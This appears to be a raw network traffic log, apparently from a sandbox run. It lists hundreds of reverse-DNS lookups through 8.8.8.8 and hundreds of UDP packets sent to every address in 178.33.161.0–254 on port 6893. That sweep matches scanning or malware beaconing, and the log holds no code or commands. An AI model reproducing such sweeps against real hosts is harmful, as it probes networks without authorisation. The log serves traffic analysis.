US 8.8.8.8:53 35.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 36.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 37.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 38.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 39.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 40.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 41.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 42.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 44.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 43.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 45.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 46.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 47.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 48.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 49.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 50.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 51.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 52.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 53.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 54.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 55.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 56.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 57.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 58.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 59.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 60.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 61.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 62.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 63.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 64.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 65.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 66.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 67.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 68.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 69.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 70.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 71.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 72.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 73.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 74.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 75.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 76.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 77.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 78.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 79.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 80.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 81.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 82.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 83.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 84.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 85.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 86.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 87.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 88.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 89.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 90.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 91.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 92.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 93.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 94.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 95.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 96.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 97.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 98.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 99.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 100.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 101.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 102.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 103.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 104.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 105.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 106.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 107.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 108.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 109.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 110.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 111.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 114.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 113.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 115.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 116.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 117.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 118.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 119.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 120.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 121.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 122.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 123.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 124.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 125.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 126.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 127.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 128.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 129.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 130.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 131.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 132.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 133.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 134.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 135.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 136.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 137.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 138.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 139.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 140.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 141.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 142.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 143.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 144.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 145.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 146.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 147.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 148.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 149.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 150.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 151.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 152.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 153.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 154.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 155.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 156.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 157.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 158.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 159.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 160.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 161.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 162.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 163.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 164.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 165.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 166.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 167.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 168.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 169.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 170.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 171.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 172.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 173.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 174.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 175.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 176.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 177.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 178.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 179.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 180.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 181.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 182.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 183.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 184.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 185.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 186.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 187.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 188.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 189.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 190.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 191.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 192.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 193.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 194.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 195.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 196.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 197.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 198.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 199.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 200.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 201.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 202.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 203.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 204.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 205.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 206.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 207.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 208.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 209.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 210.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 211.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 212.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 213.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 214.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 215.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 216.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 217.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 218.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 219.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 220.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 221.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 222.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 223.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 224.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 225.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 226.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 227.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 228.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 229.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 230.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 231.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 232.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 233.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 234.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 235.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 236.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 237.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 238.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 239.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 240.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 241.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 242.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 243.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 244.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 245.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 246.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 247.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 248.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 249.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 250.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 251.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 252.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 253.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 254.160.33.178.in-addr.arpa udp
FR 178.33.160.255:6893 udp
FR 178.33.161.0:6893 udp
FR 178.33.161.1:6893 udp
FR 178.33.161.2:6893 udp
FR 178.33.161.3:6893 udp
FR 178.33.161.4:6893 udp
FR 178.33.161.5:6893 udp
FR 178.33.161.6:6893 udp
FR 178.33.161.7:6893 udp
FR 178.33.161.8:6893 udp
FR 178.33.161.9:6893 udp
FR 178.33.161.10:6893 udp
FR 178.33.161.11:6893 udp
FR 178.33.161.12:6893 udp
FR 178.33.161.13:6893 udp
FR 178.33.161.14:6893 udp
FR 178.33.161.15:6893 udp
FR 178.33.161.16:6893 udp
FR 178.33.161.17:6893 udp
FR 178.33.161.18:6893 udp
FR 178.33.161.19:6893 udp
FR 178.33.161.20:6893 udp
FR 178.33.161.21:6893 udp
FR 178.33.161.22:6893 udp
FR 178.33.161.23:6893 udp
FR 178.33.161.24:6893 udp
FR 178.33.161.25:6893 udp
FR 178.33.161.26:6893 udp
FR 178.33.161.27:6893 udp
FR 178.33.161.28:6893 udp
FR 178.33.161.29:6893 udp
FR 178.33.161.30:6893 udp
FR 178.33.161.31:6893 udp
FR 178.33.161.32:6893 udp
FR 178.33.161.33:6893 udp
FR 178.33.161.34:6893 udp
FR 178.33.161.35:6893 udp
FR 178.33.161.36:6893 udp
FR 178.33.161.37:6893 udp
FR 178.33.161.38:6893 udp
FR 178.33.161.39:6893 udp
FR 178.33.161.40:6893 udp
FR 178.33.161.41:6893 udp
FR 178.33.161.42:6893 udp
FR 178.33.161.43:6893 udp
FR 178.33.161.44:6893 udp
FR 178.33.161.45:6893 udp
FR 178.33.161.46:6893 udp
FR 178.33.161.47:6893 udp
FR 178.33.161.48:6893 udp
FR 178.33.161.49:6893 udp
FR 178.33.161.50:6893 udp
FR 178.33.161.51:6893 udp
FR 178.33.161.52:6893 udp
FR 178.33.161.53:6893 udp
FR 178.33.161.54:6893 udp
FR 178.33.161.55:6893 udp
FR 178.33.161.56:6893 udp
FR 178.33.161.57:6893 udp
FR 178.33.161.58:6893 udp
FR 178.33.161.59:6893 udp
FR 178.33.161.60:6893 udp
FR 178.33.161.61:6893 udp
FR 178.33.161.62:6893 udp
FR 178.33.161.63:6893 udp
FR 178.33.161.64:6893 udp
FR 178.33.161.65:6893 udp
FR 178.33.161.66:6893 udp
FR 178.33.161.67:6893 udp
FR 178.33.161.68:6893 udp
FR 178.33.161.69:6893 udp
FR 178.33.161.70:6893 udp
FR 178.33.161.71:6893 udp
FR 178.33.161.72:6893 udp
FR 178.33.161.73:6893 udp
FR 178.33.161.74:6893 udp
FR 178.33.161.75:6893 udp
FR 178.33.161.76:6893 udp
FR 178.33.161.77:6893 udp
FR 178.33.161.78:6893 udp
FR 178.33.161.79:6893 udp
FR 178.33.161.80:6893 udp
FR 178.33.161.81:6893 udp
FR 178.33.161.82:6893 udp
FR 178.33.161.83:6893 udp
FR 178.33.161.84:6893 udp
FR 178.33.161.85:6893 udp
FR 178.33.161.86:6893 udp
FR 178.33.161.87:6893 udp
FR 178.33.161.88:6893 udp
FR 178.33.161.89:6893 udp
FR 178.33.161.90:6893 udp
FR 178.33.161.91:6893 udp
FR 178.33.161.92:6893 udp
FR 178.33.161.93:6893 udp
FR 178.33.161.94:6893 udp
FR 178.33.161.95:6893 udp
FR 178.33.161.96:6893 udp
FR 178.33.161.97:6893 udp
FR 178.33.161.98:6893 udp
FR 178.33.161.99:6893 udp
FR 178.33.161.100:6893 udp
FR 178.33.161.101:6893 udp
FR 178.33.161.102:6893 udp
FR 178.33.161.103:6893 udp
FR 178.33.161.104:6893 udp
FR 178.33.161.105:6893 udp
FR 178.33.161.106:6893 udp
FR 178.33.161.107:6893 udp
FR 178.33.161.108:6893 udp
FR 178.33.161.109:6893 udp
FR 178.33.161.110:6893 udp
FR 178.33.161.111:6893 udp
FR 178.33.161.112:6893 udp
FR 178.33.161.113:6893 udp
FR 178.33.161.114:6893 udp
FR 178.33.161.115:6893 udp
FR 178.33.161.116:6893 udp
FR 178.33.161.117:6893 udp
FR 178.33.161.118:6893 udp
FR 178.33.161.119:6893 udp
FR 178.33.161.120:6893 udp
FR 178.33.161.121:6893 udp
FR 178.33.161.122:6893 udp
FR 178.33.161.123:6893 udp
FR 178.33.161.124:6893 udp
FR 178.33.161.125:6893 udp
FR 178.33.161.126:6893 udp
FR 178.33.161.127:6893 udp
FR 178.33.161.128:6893 udp
FR 178.33.161.129:6893 udp
FR 178.33.161.130:6893 udp
FR 178.33.161.131:6893 udp
FR 178.33.161.132:6893 udp
FR 178.33.161.133:6893 udp
FR 178.33.161.134:6893 udp
FR 178.33.161.135:6893 udp
FR 178.33.161.136:6893 udp
FR 178.33.161.137:6893 udp
FR 178.33.161.138:6893 udp
FR 178.33.161.139:6893 udp
FR 178.33.161.140:6893 udp
FR 178.33.161.141:6893 udp
FR 178.33.161.142:6893 udp
FR 178.33.161.143:6893 udp
FR 178.33.161.144:6893 udp
FR 178.33.161.145:6893 udp
FR 178.33.161.146:6893 udp
FR 178.33.161.147:6893 udp
FR 178.33.161.148:6893 udp
FR 178.33.161.149:6893 udp
FR 178.33.161.150:6893 udp
FR 178.33.161.151:6893 udp
FR 178.33.161.152:6893 udp
FR 178.33.161.153:6893 udp
FR 178.33.161.154:6893 udp
FR 178.33.161.155:6893 udp
FR 178.33.161.156:6893 udp
FR 178.33.161.157:6893 udp
FR 178.33.161.158:6893 udp
FR 178.33.161.159:6893 udp
FR 178.33.161.160:6893 udp
FR 178.33.161.161:6893 udp
FR 178.33.161.162:6893 udp
FR 178.33.161.163:6893 udp
FR 178.33.161.164:6893 udp
FR 178.33.161.165:6893 udp
FR 178.33.161.166:6893 udp
FR 178.33.161.167:6893 udp
FR 178.33.161.168:6893 udp
FR 178.33.161.169:6893 udp
FR 178.33.161.170:6893 udp
FR 178.33.161.171:6893 udp
FR 178.33.161.172:6893 udp
FR 178.33.161.173:6893 udp
FR 178.33.161.174:6893 udp
FR 178.33.161.175:6893 udp
FR 178.33.161.176:6893 udp
FR 178.33.161.177:6893 udp
FR 178.33.161.178:6893 udp
FR 178.33.161.179:6893 udp
FR 178.33.161.180:6893 udp
FR 178.33.161.181:6893 udp
FR 178.33.161.182:6893 udp
FR 178.33.161.183:6893 udp
FR 178.33.161.184:6893 udp
FR 178.33.161.185:6893 udp
FR 178.33.161.186:6893 udp
FR 178.33.161.187:6893 udp
FR 178.33.161.188:6893 udp
FR 178.33.161.189:6893 udp
FR 178.33.161.190:6893 udp
FR 178.33.161.191:6893 udp
FR 178.33.161.192:6893 udp
FR 178.33.161.193:6893 udp
FR 178.33.161.194:6893 udp
FR 178.33.161.195:6893 udp
FR 178.33.161.196:6893 udp
FR 178.33.161.197:6893 udp
FR 178.33.161.198:6893 udp
FR 178.33.161.199:6893 udp
FR 178.33.161.200:6893 udp
FR 178.33.161.201:6893 udp
FR 178.33.161.202:6893 udp
FR 178.33.161.203:6893 udp
FR 178.33.161.204:6893 udp
FR 178.33.161.205:6893 udp
FR 178.33.161.206:6893 udp
FR 178.33.161.207:6893 udp
FR 178.33.161.208:6893 udp
FR 178.33.161.209:6893 udp
FR 178.33.161.210:6893 udp
FR 178.33.161.211:6893 udp
FR 178.33.161.212:6893 udp
FR 178.33.161.213:6893 udp
FR 178.33.161.214:6893 udp
FR 178.33.161.215:6893 udp
FR 178.33.161.216:6893 udp
FR 178.33.161.217:6893 udp
FR 178.33.161.218:6893 udp
FR 178.33.161.219:6893 udp
FR 178.33.161.220:6893 udp
FR 178.33.161.221:6893 udp
FR 178.33.161.222:6893 udp
FR 178.33.161.223:6893 udp
FR 178.33.161.224:6893 udp
FR 178.33.161.225:6893 udp
FR 178.33.161.226:6893 udp
FR 178.33.161.227:6893 udp
FR 178.33.161.228:6893 udp
FR 178.33.161.229:6893 udp
FR 178.33.161.230:6893 udp
FR 178.33.161.231:6893 udp
FR 178.33.161.232:6893 udp
FR 178.33.161.233:6893 udp
FR 178.33.161.234:6893 udp
FR 178.33.161.235:6893 udp
FR 178.33.161.236:6893 udp
FR 178.33.161.237:6893 udp
FR 178.33.161.238:6893 udp
FR 178.33.161.239:6893 udp
FR 178.33.161.240:6893 udp
FR 178.33.161.241:6893 udp
FR 178.33.161.242:6893 udp
FR 178.33.161.243:6893 udp
FR 178.33.161.244:6893 udp
FR 178.33.161.245:6893 udp
FR 178.33.161.246:6893 udp
FR 178.33.161.247:6893 udp
FR 178.33.161.248:6893 udp
FR 178.33.161.249:6893 udp
FR 178.33.161.250:6893 udp
FR 178.33.161.251:6893 udp
FR 178.33.161.252:6893 udp
FR 178.33.161.253:6893 udp
FR 178.33.161.254:6893 udp
US 8.8.8.8:53 255.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 0.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 2.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 3.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 4.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 5.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 6.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 7.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 8.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 9.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 10.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 11.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 12.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 13.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 15.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 16.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 14.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 17.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 18.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 19.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 20.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 21.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 22.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 23.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 24.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 25.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 26.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 27.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 28.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 29.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 30.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 31.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 32.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 33.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 34.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 35.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 36.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 38.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 37.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 39.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 41.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 40.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 43.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 42.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 45.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 44.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 46.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 48.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 49.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 50.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 51.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 52.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 53.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 54.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 55.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 56.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 57.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 58.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 59.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 60.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 62.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 63.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 61.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 64.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 65.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 66.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 67.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 68.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 69.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 70.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 71.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 72.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 73.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 74.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 76.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 75.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 77.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 79.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 78.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 80.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 82.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 81.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 83.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 84.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 85.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 86.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 87.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 88.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 89.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 92.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 91.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 93.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 94.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 95.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 96.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 97.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 98.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 99.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 100.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 101.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 103.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 102.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 104.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 105.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 106.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 107.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 108.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 109.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 110.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 111.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 112.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 113.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 114.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 115.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 116.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 117.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 118.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 119.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 120.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 121.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 122.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 123.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 124.161.33.178.in-addr.arpa udp
US 8.8.8.8:53 125.161.33.178.in-addr.arpa udp
